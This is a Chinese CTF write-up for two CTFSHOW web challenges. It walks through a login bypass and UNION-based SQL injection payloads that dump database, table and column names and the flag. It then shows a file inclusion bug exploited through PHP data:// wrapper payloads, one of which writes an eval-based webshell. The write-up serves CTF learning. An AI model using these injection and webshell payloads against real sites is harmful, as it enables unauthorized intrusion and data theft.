html ctf查找,CTFSHOW的web部分writeup

WEB2

题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin‘or 1=1#(CTF中SQL万能密码集合)发现成功执行,于是

af5d2a99ffc51afa3c09f0b47733d1cc.png

order by查找回显数

username=ctfshow‘ order by 3 #&password=1

d085c60744568c89768da6ba5831e3ff.png

90e424ddcde59bd38dad8671e808233d.png

在3时正常回显,4是无回显,说明回显数为3

使用union select 联合查询爆库名

username=ctfshow‘ union select 1,database(),3#&password=1

7b1071bf364a1d01b5a1dfb2673702da.png

发现数据库是web2,继续爆表名:

username=ctfshow‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #&password=1

爆字段:

username=ctfshow‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag‘#&password=1

爆flag;

username=ctfshow‘ union select 1,group_concat(flag),3 from flag #&password=1

5cafbea3d2a1d601c669aa280d66379b.png

web3

打开网站提示输入url,测试/etc/passwd成功显示,应为文件包含漏洞

05112cebfa0f4c564c35d5767eee2655.png

第一种方法:

php伪协议中的data通过通配符查找目录下的所有文件

==url=data://text/plain,<?php print_r(glob("*")); ?>==

e1adcccbbf89cfead4b538b55936ee76.png

c39223ccda628eaf8dba4d9bd36bdfb1.png

得到 ctf_go_go_go

直接访问得flag

第二种方法:

写入一句话菜刀连接

==url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[‘hack‘]);?>")?>==

51f23ab1980a41419bd7bb6740fb89fe.png

32a4de4c7d0630b658a691ef01c12bc0.png

原文:https://www.cnblogs.com/zw7889/p/13698196.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值